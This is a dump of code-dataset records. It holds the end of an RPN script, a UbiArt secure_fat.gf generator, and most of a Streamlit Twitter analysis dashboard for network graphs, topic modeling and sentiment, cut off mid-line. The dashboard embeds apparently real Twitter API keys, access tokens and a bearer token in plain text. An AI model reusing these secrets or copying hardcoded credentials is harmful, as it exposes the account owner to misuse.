except ValueError:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NicholasStone/Homeworks","sub_path":"Compilers/RPN.py","file_name":"RPN.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21522889944","text":"#\r\n# https://github.com/wukko/ubiart-secure-fat\r\n#\r\n# UbiArt secure_fat.gf file generator using existing IPK bundles by https://github.com/wukko\r\n# Tested on Just Dance 2015 - 2022 games on PC, Wii, Wii U, Nintendo Switch (NX).\r\n# This script should work for Rayman Legends/Origins and other UbiArt games too.\r\n#\r\n# This script includes all matching files in current directory and its subdirectories when used standalone. Keep this in mind when using it.\r\n#\r\n# Credit to me (https://github.com/wukko) is required when this script is used in other projects.\r\n\r\nimport os\r\n\r\n# Modify these variables for standalone use if needed\r\nout = \"secure_fat.gf\"\r\nbext = \".ipk\"\r\nignore = [\"patch\"]\r\np = [\"pc\", \"wiiu\", \"wii\", \"nx\", \"x360\", \"durango\", \"scarlett\", \"ps3\", \"orbis\", \"prospero\", \"ggp\"]\r\n\r\ndef nameOnly(name, ext):\r\n name = name.split('/')[len(name.split('/'))-1]\r\n for i in p:\r\n name = name.replace(ext, '').replace('_'+i, '')\r\n return name\r\n\r\ndef hashList(input):\r\n hashes = []\r\n with open(input, \"rb\") as f:\r\n f.read(16)\r\n filecount = int.from_bytes(f.read(4), \"big\")\r\n f.read(40)\r\n counter = 0\r\n while counter != filecount:\r\n f.read(16)\r\n f.read(int.from_bytes(f.read(4), \"big\"))\r\n f.read(int.from_bytes(f.read(4), \"big\"))\r\n hashes.append(f.read(4))\r\n f.read(16)\r\n counter += 1\r\n return hashes\r\n\r\ndef generateSecureFat(cwd, out, bext, ignore):\r\n bl = []\r\n\r\n for root, dir_names, file_names in os.walk(cwd):\r\n for f in file_names:\r\n path = os.path.join(root, f).replace(cwd, '')[1:]\r\n if path[-4:] == bext:\r\n bl.append(path)\r\n\r\n bl = [b for b in bl if not nameOnly(b, bext) in ignore]\r\n\r\n with open(out, \"wb\") as f:\r\n bundleCount = 0\r\n hashesCount = 0\r\n body = b''\r\n footer = b''\r\n for i in bl:\r\n ipkhash = hashList(i)\r\n hashesCount += len(ipkhash)\r\n ipkname = nameOnly(i, bext).encode()\r\n for h in ipkhash:\r\n body += h + b'\\x00\\x00\\x00\\x01' + bundleCount.to_bytes(1, \"big\")\r\n footer += bundleCount.to_bytes(1, \"big\") + len(ipkname).to_bytes(4, \"big\") + ipkname\r\n bundleCount = bundleCount + 1\r\n f.write(b'\\x55\\x53\\x46\\x54\\x1F\\x5E\\xE4\\x2F\\x00\\x00\\x00\\x01' + hashesCount.to_bytes(4, \"big\"))\r\n f.write(body)\r\n f.write(bundleCount.to_bytes(4, \"big\"))\r\n f.write(footer)\r\n\r\nif __name__ == \"__main__\":\r\n generateSecureFat(os.getcwd(), out, bext, ignore)\r\n","repo_name":"wukko/ubiart-secure-fat","sub_path":"generateSecureFat.py","file_name":"generateSecureFat.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39973395506","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom utils import logout\r\nfrom streamlit_extras.switch_page_button import switch_page\r\nimport os\r\nimport json\r\nimport datetime\r\nfrom datetime import datetime, timedelta\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport networkx as nx\r\nfrom pyvis.network import Network as net\r\nimport tweepy\r\nfrom streamlit_tags import st_tags\r\nfrom json 
import JSONEncoder\r\nimport PIL\r\nimport time\r\nimport nltk\r\nimport gensim\r\nimport pyLDAvis.gensim_models as gensimvis\r\nimport pyLDAvis\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport pyLDAvis.gensim\r\nfrom matplotlib import font_manager, mathtext\r\nfrom pathlib import Path\r\n\r\nnltk.download('vader_lexicon')\r\n\r\n\r\nconsumer_key = \"1Hov50UKDBETZmY1wR9zkE3Q7\"\r\nconsumer_secret = \"lAAcJVSDE1Oyc1BuOmxJNN4D575NkHQcg3hEa5zeurrGwCpXH0\"\r\naccess_token = \"16645853-jRxQql8XCzcaWsBSTeA3eutXPA5xRcHxqRHDgx6m9\"\r\naccess_token_secret = \"STmNDeF9BX33PTYuE18vPq7yndA4okKroeq9LXX6FV2gk\"\r\nbearer_token = 'AAAAAAAAAAAAAAAAAAAAALMe9wAAAAAAN%2BggvuMVDLKLIEX3Kk%2B8nOSxH88%3DiBMoMLAjE4JuPUKzRyZjYbs5zRZ82uZk9T89YCBgKkeXmgbKY5'\r\n\r\naccounts = []\r\nauth = tweepy.OAuth1UserHandler(consumer_key=consumer_key, consumer_secret=consumer_secret, access_token=access_token, access_token_secret=access_token_secret)\r\n# auth.set_access_token(, 'ph47iEpbfD4USmwynPCL1LLNtl7f9seLovjIHOUqwTuQq')\r\napi = tweepy.API(auth)\r\nclient = tweepy.Client(bearer_token=bearer_token)\r\n\r\nnltk.download('punkt')\r\nnltk.download('stopwords')\r\nnltk.download('wordnet')\r\n\r\n\r\nst.set_page_config(page_title=\"Forteks | Twitter Analysis\", layout=\"wide\")\r\n\r\nhide_st_style = \"\"\"\r\n \r\n \"\"\"\r\nst.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\nclass DateTimeEncoder(JSONEncoder):\r\n def default(self, o):\r\n if isinstance(o, datetime):\r\n return o.isoformat()\r\n return super().default(o)\r\n\r\n\r\n\r\n####################LOGOUT####################\r\nwith st. sidebar:\r\n if st.button(\"Logout\"):\r\n logout()\r\n switch_page('home')\r\n\r\n#################STARTPAGE###################\r\n\r\na, b = st.columns([1, 10])\r\n\r\nwith a:\r\n st.text(\"\")\r\n st.image(\"img/twitterlkogo.png\", width=100)\r\nwith b:\r\n st.title(\"Twitter Analysis\")\r\n###############################################\r\nlistTabs = [\r\n \"👨‍💼 Key Persons Analysis\",\r\n \"🦈 Issue Analysis\",\r\n \"📈 Data Mining\",\r\n \r\n]\r\n\r\nfont_css = \"\"\"\r\n\r\n\"\"\"\r\nst.write(font_css, unsafe_allow_html=True)\r\nwhitespace = 30\r\ntab1, tab2, tab3 = st.tabs([s.center(whitespace,\"\\u2001\") for s in listTabs])\r\n\r\nwith tab1:\r\n st.header(\"KEY PERSONS\")\r\n\r\n container1=st.container()\r\n with container1:\r\n folder_path = \"twittl\"\r\n files = os.listdir(folder_path)\r\n\r\n # Get the modification times of the files\r\n file_times = [(f, os.path.getmtime(os.path.join(folder_path, f))) for f in files]\r\n\r\n # Sort the files based on modification time in descending order\r\n sorted_files = sorted(file_times, key=lambda x: x[1], reverse=True)\r\n\r\n # Select the four newest files\r\n num_files = min(4, len(sorted_files))\r\n newest_files = [f[0] for f in sorted_files[:num_files]]\r\n\r\n # Update the 'files' variable with the names of the newest files\r\n files = newest_files\r\n\r\n if len(files) > 0:\r\n # Create a Streamlit column for each file\r\n cols = st.columns(num_files)\r\n\r\n for i, col in enumerate(cols):\r\n # Check if the file is in JSON format\r\n if i < num_files and files[i].endswith('.json'):\r\n # Open the file and read its contents as a JSON object\r\n with open(os.path.join(folder_path, files[i]), 'r') as f:\r\n user_data = json.load(f)\r\n \r\n # Access the follower count\r\n followers_count = user_data[\"tweets\"][0][\"user\"][\"followers_count\"]\r\n 
profilepic = user_data[\"tweets\"][0][\"user\"][\"profile_image_url_https\"]\r\n\r\n                    friend_count = user_data[\"tweets\"][0][\"user\"][\"friends_count\"]\r\n                    listed_count = user_data[\"tweets\"][0][\"user\"][\"listed_count\"]\r\n                    status = user_data[\"tweets\"][0][\"user\"][\"statuses_count\"]\r\n\r\n                    # Display the user data in the column\r\n                    col.image(profilepic, width=100)\r\n                    # col.write(f\"Account: {files[i].replace('_data.json', '')}\")\r\n                    col.write(f\"{user_data['name']}\")\r\n                    col.write(f\"{user_data['description']}\")\r\n                    col.write(f\"Tweets: {status}\")\r\n                    col.write(f\"Followers: {followers_count}\")\r\n                    col.write(f\"Friends: {friend_count}\")\r\n                    col.write(f\"Listed: {listed_count}\")\r\n\r\n        ######################################CHART TIME SERIES#######################\r\n\r\n        st.header(\"TIME SERIES ANALYSIS OF THE KEY PERSONS\")\r\n\r\n        files = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if f.endswith('.json')]\r\n        df1 = None\r\n\r\n        if files:\r\n            data = []\r\n            for file in files:\r\n                with open(file, 'r') as f:\r\n                    file_data = json.load(f)\r\n                    for tweet in file_data['tweets']:\r\n                        data.append({\r\n                            'name': tweet['user']['name'],\r\n                            'date': pd.to_datetime(tweet['created_at'])\r\n                        })\r\n            df1 = pd.DataFrame(data)\r\n\r\n        # Create a list of available screen names\r\n        if df1 is not None:\r\n            names = list(df1['name'].unique())\r\n        else:\r\n            names = []\r\n\r\n        # Set the default selected names to the first 4 accounts\r\n        default_names = names[:4]\r\n\r\n        # Set the default time range to one month from the current date\r\n        end_date = pd.to_datetime(datetime.today(), utc=True)\r\n        start_date = end_date - timedelta(days=30)\r\n\r\n        # Create widgets for selecting the screen name and time range\r\n        selected_names = st.multiselect('Select names to compare', names, default=default_names, key='selper')\r\n        cols_ta, cols_tb = st.columns([1, 1])\r\n        start_date = pd.to_datetime(cols_ta.date_input('Start date', value=start_date), utc=True)\r\n        end_date = pd.to_datetime(cols_tb.date_input('End date', value=end_date), utc=True)\r\n\r\n        # Filter the data based on the selected names and time range\r\n        if df1 is not None:\r\n            mask = (df1['name'].isin(selected_names)) & (df1['date'] >= start_date) & (df1['date'] <= end_date)\r\n            df1_filtered = df1.loc[mask]\r\n        else:\r\n            df1_filtered = pd.DataFrame()\r\n\r\n        if len(df1_filtered) > 0:\r\n            df1_grouped = df1_filtered.groupby(['date', 'name']).size().reset_index(name='count')\r\n            fig, ax = plt.subplots(figsize=(10, 6))\r\n            sns.lineplot(data=df1_grouped, x='date', y='count', hue='name', ax=ax)\r\n            ax.set_title(f\"Tweets per Day for {', '.join(selected_names)}\")\r\n            ax.set_xlabel(\"Date\")\r\n            ax.set_ylabel(\"Number of Tweets\")\r\n            st.pyplot(fig)\r\n        else:\r\n            st.write(\"No data available for the selected time range and users.\")\r\n\r\n        st.markdown(\"---\")\r\n\r\n        #####################SNA########################\r\n        st.header(\"SOCIAL NETWORK ANALYSIS OF THE KEY PERSONS\")\r\n        def get_followers_following_tweets(folder_path):\r\n            followers = {}\r\n            following = {}\r\n            tweet_data = []\r\n\r\n            for file_name in os.listdir(folder_path):\r\n                if file_name.endswith('.json'):\r\n                    account = file_name.split('.')[0]\r\n                    with open(os.path.join(folder_path, file_name), 'r') as f:\r\n                        data = json.load(f)\r\n                        followers[account] = data['followers']\r\n                        following[account] = data['following']\r\n                        tweets = data['tweets']\r\n                        for tweet in tweets:\r\n                            tweet_info = {}\r\n                            tweet_info['id_str'] = 
tweet['id_str']\r\n tweet_info['created_at'] = tweet['created_at']\r\n tweet_info['full_text'] = tweet['full_text']\r\n tweet_info['user_mentions'] = tweet['entities']['user_mentions']\r\n tweet_info['retweeted_user'] = tweet['retweeted_status']['user']['screen_name'] if 'retweeted_status' in tweet else None\r\n tweet_info['in_reply_to_screen_name'] = tweet['in_reply_to_screen_name']\r\n tweet_info['tweet_url'] = f\"https://twitter.com/{account}/status/{tweet['id_str']}\"\r\n tweet_data.append(tweet_info)\r\n\r\n return followers, following, tweet_data\r\n\r\n def build_social_network(followers, following):\r\n G = nx.DiGraph()\r\n\r\n for account in followers.keys():\r\n G.add_node(account, title=account, label=account)\r\n\r\n for follower in followers[account]:\r\n G.add_edge(follower, account)\r\n\r\n for followee in following[account]:\r\n G.add_edge(account, followee)\r\n\r\n # Add 'not_followed_back' nodes and edges\r\n not_followed_back = set(followers[account]) - set(following[account])\r\n for not_followed in not_followed_back:\r\n G.add_node(not_followed, title=not_followed, label=not_followed)\r\n G.add_edge(not_followed, account, relationship='not_followed_back')\r\n\r\n # Add 'not_following_back' nodes and edges\r\n not_following_back = set(following[account]) - set(followers[account])\r\n for not_following in not_following_back:\r\n G.add_node(not_following, title=not_following, label=not_following)\r\n G.add_edge(account, not_following, relationship='not_following_back')\r\n\r\n return G\r\n \r\n\r\n def visualize_social_network(G, selected_accounts):\r\n subgraph_nodes = set()\r\n for account in selected_accounts:\r\n subgraph_nodes |= set([account] + followers[account] + following[account])\r\n subgraph = G.subgraph(subgraph_nodes)\r\n\r\n nt = net(height='750px', width='100%', bgcolor='#fff', font_color='#3C486B', directed=True)\r\n\r\n node_colors = {}\r\n for account in selected_accounts:\r\n node_colors[account] = '#2CD3E1'\r\n for follower in followers[account]:\r\n node_colors[follower] = '#FF6969'\r\n for followee in following[account]:\r\n node_colors[followee] = '#FFD3B0'\r\n\r\n # Add node colors for 'not_following_back'\r\n not_following_back = set(following[account]) - set(followers[account])\r\n for not_following in not_following_back:\r\n node_colors[not_following] = '#F5AEC1'\r\n\r\n # Add node colors for 'not_followed_back'\r\n not_followed_back = set(followers[account]) - set(following[account])\r\n for not_followed in not_followed_back:\r\n node_colors[not_followed] = '#FFA500'\r\n\r\n for node in subgraph.nodes():\r\n nt.add_node(node, title=node, label=node, color=node_colors.get(node, 'skyblue'))\r\n\r\n for edge in subgraph.edges():\r\n nt.add_edge(edge[0], edge[1])\r\n\r\n nt.font_color = 'white'\r\n \r\n nt.save_graph('html_files/social_network.html')\r\n\r\n # Display the network visualization in Streamlit\r\n with open('html_files/social_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n # Read the data\r\n followers, following, tweet_data = get_followers_following_tweets(folder_path)\r\n\r\n # Build the social network\r\n G = build_social_network(followers, following)\r\n\r\n default_accounts = list(followers.keys())[:4]\r\n\r\n # Ask the user which accounts to visualize using st.sidebar.multiselect\r\n selected_accounts = st.multiselect('Select accounts to visualize', list(followers.keys()), default=default_accounts)\r\n\r\n # Retrieve the account names instead of file 
names\r\n account_names = [account.split('_')[0] for account in selected_accounts]\r\n\r\n # Display the selected account names in the Streamlit header\r\n st.header(\"Social Network Accounts' Followers and Friends: \" + ', '.join(account_names))\r\n # Visualize the selected accounts\r\n visualize_social_network(G, selected_accounts) \r\n \r\n st.markdown(\"---\")\r\n ##############################################################################\r\n ############################################################################ \r\n \r\nwith tab2:\r\n st.header('Issue Analysis')\r\n\r\n folder_path = \"twitkeys\"\r\n\r\n files = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if f.endswith('.json')]\r\n df = None\r\n\r\n if files:\r\n data = []\r\n for file in files:\r\n keyword = os.path.splitext(os.path.basename(file))[0]\r\n with open(file, 'r') as f:\r\n file_data = json.load(f)\r\n for tweet_data in file_data['data']:\r\n tweet = tweet_data['Text']\r\n created_at = pd.to_datetime(tweet_data['Created At'])\r\n data.append({\r\n 'keyword': keyword,\r\n 'text': tweet,\r\n 'date': created_at\r\n })\r\n df = pd.DataFrame(data)\r\n\r\n # Create a list of available keywords\r\n if df is not None:\r\n keywords = list(df['keyword'].unique())\r\n else:\r\n keywords = []\r\n\r\n # Set the default selected keywords to the first 4 keywords\r\n default_keywords = keywords[:4]\r\n\r\n # Set the default time range to one month from the current date\r\n end_date = pd.to_datetime(datetime.today().date())\r\n start_date = end_date - timedelta(days=30)\r\n\r\n # Create widgets for selecting the keywords and time range\r\n selected_keywords = st.multiselect('Select keywords to compare', keywords, default=default_keywords, key='selissue')\r\n cols_ta, cols_tb = st.columns([1, 1])\r\n start_date = pd.to_datetime(cols_ta.date_input('Start date', value=start_date, key='start_date')).date()\r\n end_date = pd.to_datetime(cols_tb.date_input('End date', value=end_date, key='end_date')).date()\r\n\r\n # Filter the data based on the selected keywords and time range\r\n if df is not None:\r\n mask = (df['keyword'].isin(selected_keywords)) & (df['date'].dt.date >= start_date) & (df['date'].dt.date <= end_date)\r\n df_filtered = df.loc[mask]\r\n else:\r\n df_filtered = pd.DataFrame()\r\n\r\n if len(df_filtered) > 0:\r\n df_grouped = df_filtered.groupby(['date', 'keyword']).size().reset_index(name='count')\r\n fig, ax = plt.subplots(figsize=(10, 6))\r\n sns.lineplot(data=df_grouped, x='date', y='count', hue='keyword', ax=ax)\r\n ax.set_title(f\"Tweets per Day for {', '.join(selected_keywords)}\")\r\n ax.set_xlabel(\"Date\")\r\n ax.set_ylabel(\"Number of Tweets\")\r\n st.pyplot(fig)\r\n else:\r\n st.write(\"No data available for the selected time range and keywords.\")\r\n\r\n \r\n ################ SNA ####################\r\n import glob\r\n\r\n\r\n def process_json_files(files):\r\n G = nx.DiGraph()\r\n \r\n for file in files:\r\n with open(file, 'r') as f:\r\n file_data = json.load(f)\r\n for tweet_data in file_data['data']:\r\n user_screen_name = tweet_data['User Screen Name']\r\n mentioned_users = [user['User Screen Name'] for user in tweet_data['mentioned_users']]\r\n retweeted_user = tweet_data['Retweeted Tweet']['Author Screen Name'] if 'Retweeted Tweet' in tweet_data else None\r\n hashtags = tweet_data['Hashtags']\r\n \r\n G.add_node(user_screen_name)\r\n if retweeted_user:\r\n G.add_node(retweeted_user)\r\n G.add_edge(user_screen_name, retweeted_user, relationship='retweeted')\r\n for 
mentioned_user in mentioned_users:\r\n                        G.add_node(mentioned_user)\r\n                        G.add_edge(user_screen_name, mentioned_user, relationship='mentioned')\r\n\r\n                    for hashtag in hashtags:\r\n                        # Connect users who have used the same hashtag; users seen so far\r\n                        # are tracked per hashtag in the graph-level metadata dict\r\n                        hashtag_users = G.graph.setdefault('hashtag_users', {}).setdefault(hashtag, set())\r\n                        for other_user in hashtag_users:\r\n                            if other_user != user_screen_name:\r\n                                G.add_edge(user_screen_name, other_user, relationship=hashtag)\r\n                        hashtag_users.add(user_screen_name)\r\n\r\n        return G\r\n\r\n    # Read JSON files from the folder\r\n    folder_path = \"twitkeys\"\r\n\r\n    # Create the social network graph\r\n    G = process_json_files(files)\r\n\r\n    # Function to visualize the social network using pyvis\r\n    def visualize_social_network(G):\r\n        nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n        for node in G.nodes:\r\n            nt.add_node(node, label=node)\r\n\r\n        for edge in G.edges:\r\n            source = edge[0]\r\n            target = edge[1]\r\n            relationship = G.edges[edge]['relationship']\r\n            nt.add_edge(source, target, label=relationship)\r\n\r\n        nt.save_graph('html_files/issue_social_network.html')\r\n\r\n        # Display the graph in Streamlit\r\n        with open('html_files/issue_social_network.html', 'r') as f:\r\n            html_string = f.read()\r\n        st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n    default_files = [os.path.splitext(os.path.basename(file))[0] for file in files[:4]] if len(files) >= 4 else [os.path.splitext(os.path.basename(file))[0] for file in files]\r\n    selected_files = st.multiselect('Select Issue/Topic', [os.path.splitext(os.path.basename(file))[0] for file in files], default=default_files, format_func=lambda x: f\"{x}.json\")\r\n\r\n    # Process the selected JSON files and build the social network graph\r\n    selected_files_paths = [os.path.join(folder_path, f\"{file}.json\") for file in selected_files]\r\n    selected_G = process_json_files(selected_files_paths)\r\n\r\n    # Visualize the social network\r\n    # visualize_social_network(selected_G)\r\n\r\n    ####################DEGREE CENTRALITY###########################\r\n    # Calculate degree centrality\r\n    degree_centrality = nx.degree_centrality(selected_G)\r\n\r\n    # Create a subgraph with nodes having non-zero degree centrality\r\n    degree_subgraph = selected_G.subgraph([node for node, centrality in degree_centrality.items() if centrality > 0])\r\n\r\n    # Function to visualize the degree centrality network and top actors using Pyvis and matplotlib\r\n    def visualize_degree_centrality_network(subgraph, centrality_values):\r\n        nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n        # Add nodes to the network with size based on degree centrality\r\n        for node in subgraph.nodes:\r\n            centrality = centrality_values[node]\r\n            node_size = centrality * 20  # Adjust the scaling factor as needed\r\n            nt.add_node(node, label=node, size=node_size)\r\n\r\n        # Add edges to the network\r\n        for edge in subgraph.edges:\r\n            source = edge[0]\r\n            target = edge[1]\r\n            relationship = subgraph.edges[edge]['relationship']\r\n            nt.add_edge(source, target, label=relationship)\r\n\r\n        nt.save_graph('html_files/degree_centrality_network.html')\r\n\r\n        with 
open('html_files/degree_centrality_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n # Calculate and plot the top actors based on degree centrality\r\n top_actors = sorted(centrality_values, key=centrality_values.get, reverse=True)[:5]\r\n centrality_scores = [centrality_values[actor] for actor in top_actors]\r\n\r\n y_pos = np.arange(len(top_actors))\r\n\r\n fig, ax = plt.subplots()\r\n ax.barh(y_pos, centrality_scores)\r\n ax.set_xlabel('Degree Centrality')\r\n ax.set_ylabel('Top Actors')\r\n ax.set_title('Top Main Actors')\r\n ax.set_yticks(y_pos)\r\n ax.set_yticklabels(top_actors)\r\n plt.tight_layout()\r\n\r\n # Display the plot in Streamlit\r\n st.pyplot(fig)\r\n\r\n\r\n################## BETWEENESS CENTRALITY ##########################\r\n # Calculate betweenness centrality\r\n betweenness_centrality = nx.betweenness_centrality(selected_G)\r\n\r\n # Create a subgraph with nodes having non-zero betweenness centrality\r\n betweenness_subgraph = selected_G.subgraph([node for node, centrality in betweenness_centrality.items() if centrality > 0])\r\n\r\n\r\n\r\n # Function to visualize the betweenness centrality network and top actors using Pyvis and matplotlib\r\n def visualize_betweenness_centrality_network(subgraph, centrality_values):\r\n nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n # Add nodes to the network with size based on betweenness centrality\r\n for node in subgraph.nodes:\r\n centrality = centrality_values[node]\r\n node_size = centrality * 20 # Adjust the scaling factor as needed\r\n nt.add_node(node, label=node, size=node_size)\r\n\r\n # Add edges to the network\r\n for edge in subgraph.edges:\r\n source = edge[0]\r\n target = edge[1]\r\n relationship = subgraph.edges[edge]['relationship']\r\n nt.add_edge(source, target, label=relationship)\r\n\r\n nt.save_graph('html_files/betweenness_centrality_network.html')\r\n\r\n \r\n with open('html_files/betweenness_centrality_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n # Calculate and plot the top actors based on betweenness centrality\r\n top_actors = sorted(centrality_values, key=centrality_values.get, reverse=True)[:5]\r\n centrality_scores = [centrality_values[actor] for actor in top_actors]\r\n\r\n y_pos = np.arange(len(top_actors))\r\n\r\n fig, ax = plt.subplots()\r\n ax.barh(y_pos, centrality_scores)\r\n ax.set_xlabel('Betweenness Centrality')\r\n ax.set_ylabel('Actors')\r\n ax.set_title('Top Actors based on Betweenness Centrality')\r\n ax.set_yticks(y_pos)\r\n ax.set_yticklabels(top_actors)\r\n plt.tight_layout()\r\n\r\n # Display the plot in Streamlit\r\n st.pyplot(fig)\r\n##################################################################\r\n def calculate_closeness_centrality(G):\r\n closeness_centrality = nx.closeness_centrality(G)\r\n\r\n return closeness_centrality\r\n \r\n # Calculate closeness centrality\r\n closeness_centrality = calculate_closeness_centrality(selected_G)\r\n\r\n # Sort the centrality values in descending order\r\n sorted_centrality = sorted(closeness_centrality.items(), key=lambda x: x[1], reverse=True)\r\n\r\n # Extract the top nodes and their centrality values\r\n top_nodes = [node for node, centrality in sorted_centrality[:10]]\r\n top_centrality = [centrality for node, centrality in sorted_centrality[:10]]\r\n # Function to visualize the closeness centrality network using 
Pyvis\r\n def visualize_closeness_centrality_network(G, centrality_values):\r\n nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n # Add nodes to the network with size based on closeness centrality\r\n for node in G.nodes:\r\n centrality = centrality_values[node]\r\n node_size = centrality * 20 # Adjust the scaling factor as needed\r\n nt.add_node(node, label=node, size=node_size)\r\n\r\n # Add edges to the network\r\n for edge in G.edges:\r\n source = edge[0]\r\n target = edge[1]\r\n relationship = G.edges[edge]['relationship']\r\n nt.add_edge(source, target, label=relationship)\r\n\r\n nt.save_graph('html_files/closeness_centrality_network.html')\r\n with open('html_files/closeness_centrality_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n plt.figure(figsize=(10, 6))\r\n plt.bar(top_nodes, top_centrality)\r\n plt.xlabel('Nodes')\r\n plt.ylabel('Closeness Centrality')\r\n plt.title('Top Actors Based on Closeness Centrality')\r\n plt.xticks(rotation=90)\r\n plt.tight_layout()\r\n\r\n # Display the chart in Streamlit\r\n st.pyplot(plt)\r\n\r\n\r\n\r\n\r\n############################VISUGRAPJH###########################\r\n colviz1, colviz2, colviz3, colviz4=st.tabs(['Social Network','Main Actors', 'Bridging Actors', 'Supporting Actors'])\r\n with colviz1:\r\n visualize_social_network(selected_G)\r\n \r\n with colviz2:\r\n visualize_degree_centrality_network(degree_subgraph, degree_centrality)\r\n\r\n with colviz3:\r\n visualize_betweenness_centrality_network(betweenness_subgraph, betweenness_centrality)\r\n \r\n with colviz4:\r\n visualize_closeness_centrality_network(selected_G, closeness_centrality)\r\n \r\n#################################################################################\r\n######################TOPIC MODELING#############################################\r\n\r\n\r\n\r\n # Function to load and preprocess the text data\r\n def load_and_preprocess_data(file_path):\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n \r\n # Preprocess the text (e.g., lowercase, tokenization, stopwords removal, etc.)\r\n preprocessed_text_data = []\r\n stop_words = set(stopwords.words('indonesian'))\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n for tweet_data in data['data']:\r\n text = tweet_data['Text']\r\n\r\n # Convert text to lowercase\r\n text = text.lower()\r\n\r\n # Tokenize the text\r\n tokens = word_tokenize(text)\r\n\r\n # Remove stopwords and perform lemmatization\r\n processed_tokens = [lemmatizer.lemmatize(token) for token in tokens if token not in stop_words]\r\n\r\n # Append the processed tokens to the preprocessed text data\r\n preprocessed_text_data.append(processed_tokens)\r\n \r\n # Return the preprocessed text data\r\n return preprocessed_text_data\r\n\r\n # Function to perform topic modeling\r\n def perform_topic_modeling(text_data):\r\n # Create a dictionary from the text data\r\n dictionary = gensim.corpora.Dictionary(text_data)\r\n \r\n # Create a corpus (Bag of Words representation)\r\n corpus = [dictionary.doc2bow(text) for text in text_data]\r\n \r\n # Perform topic modeling using LDA\r\n lda_model = gensim.models.LdaModel(corpus=corpus, id2word=dictionary, num_topics=10, passes=10)\r\n \r\n # Return the LDA model\r\n return lda_model\r\n\r\n \r\n\r\n # Main Streamlit app\r\n st.title(\"Topic Modeling with pyLDAvis\")\r\n\r\n # Folder path containing the JSON files\r\n folder_path = \"twitkeys\"\r\n\r\n # Get the list of JSON 
files in the folder\r\n file_list = [file_name for file_name in os.listdir(folder_path) if file_name.endswith('.json')]\r\n\r\n # Select files\r\n selected_files = st.multiselect(\"Select Files\", file_list, default=file_list[:1])\r\n\r\n\r\n # List to store preprocessed text data from selected files\r\n preprocessed_text_data = []\r\n\r\n # Iterate over the selected files\r\n for file_name in selected_files:\r\n file_path = os.path.join(folder_path, file_name)\r\n\r\n # Load and preprocess the text data from the file\r\n text_data = load_and_preprocess_data(file_path)\r\n\r\n # Append the preprocessed text data to the list\r\n preprocessed_text_data.extend(text_data)\r\n\r\n\r\n # Perform topic modeling on the preprocessed text data\r\n lda_model = perform_topic_modeling(preprocessed_text_data)\r\n\r\n dictionary = gensim.corpora.Dictionary(preprocessed_text_data)\r\n corpus = [dictionary.doc2bow(text) for text in preprocessed_text_data]\r\n\r\n # Generate the pyLDAvis visualization\r\n lda_display = pyLDAvis.gensim.prepare(lda_model, corpus, dictionary, sort_topics=False)\r\n\r\n # Save the HTML file\r\n pyLDAvis.save_html(lda_display, \"lda.html\")\r\n\r\n # Read the HTML file\r\n with open(\"lda.html\", \"r\") as f:\r\n html_string = f.read()\r\n\r\n # Display the HTML file in Streamlit\r\n st.components.v1.html(html_string, height=800, width=1500, scrolling=False)\r\n\r\n\r\n################################ SENTIMENT ANALYSIS#################################\r\n\r\n from nltk.sentiment import SentimentIntensityAnalyzer\r\n import numpy as np\r\n\r\n from Sastrawi.Stemmer.StemmerFactory import StemmerFactory\r\n\r\n\r\n # Function to load and preprocess the text data\r\n def load_and_preprocess_data(file_path):\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n\r\n # Preprocess the text (e.g., lowercase, tokenization, stopwords removal, etc.)\r\n preprocessed_text_data = []\r\n stop_words = set(stopwords.words('indonesian'))\r\n stemmer = StemmerFactory().create_stemmer()\r\n\r\n for tweet_data in data['data']:\r\n text = tweet_data['Text']\r\n\r\n # Convert text to lowercase\r\n text = text.lower()\r\n\r\n # Tokenize the text\r\n tokens = word_tokenize(text)\r\n\r\n # Remove stopwords and perform stemming\r\n processed_tokens = [stemmer.stem(token) for token in tokens if token not in stop_words]\r\n\r\n # Append the processed tokens to the preprocessed text data\r\n preprocessed_text_data.append(processed_tokens)\r\n\r\n # Return the preprocessed text data\r\n return preprocessed_text_data\r\n\r\n\r\n # Function to perform sentiment analysis using VADER\r\n def perform_sentiment_analysis(text_data):\r\n # Initialize the VADER sentiment intensity analyzer\r\n sia = SentimentIntensityAnalyzer()\r\n\r\n # Perform sentiment analysis on each text\r\n sentiment_scores = []\r\n for text in text_data:\r\n sentiment_score = sia.polarity_scores(' '.join(text))\r\n sentiment_scores.append(sentiment_score)\r\n\r\n # Convert the sentiment scores to a DataFrame\r\n df_sentiment = pd.DataFrame(sentiment_scores)\r\n\r\n # Return the DataFrame with sentiment scores\r\n return df_sentiment\r\n\r\n\r\n # Main Streamlit app\r\n st.title(\"Sentiment Analysis\")\r\n\r\n # Folder path containing the JSON files\r\n folder_path = \"twitkeys\"\r\n\r\n # Get the list of JSON files in the folder\r\n file_list = [file_name for file_name in os.listdir(folder_path) if 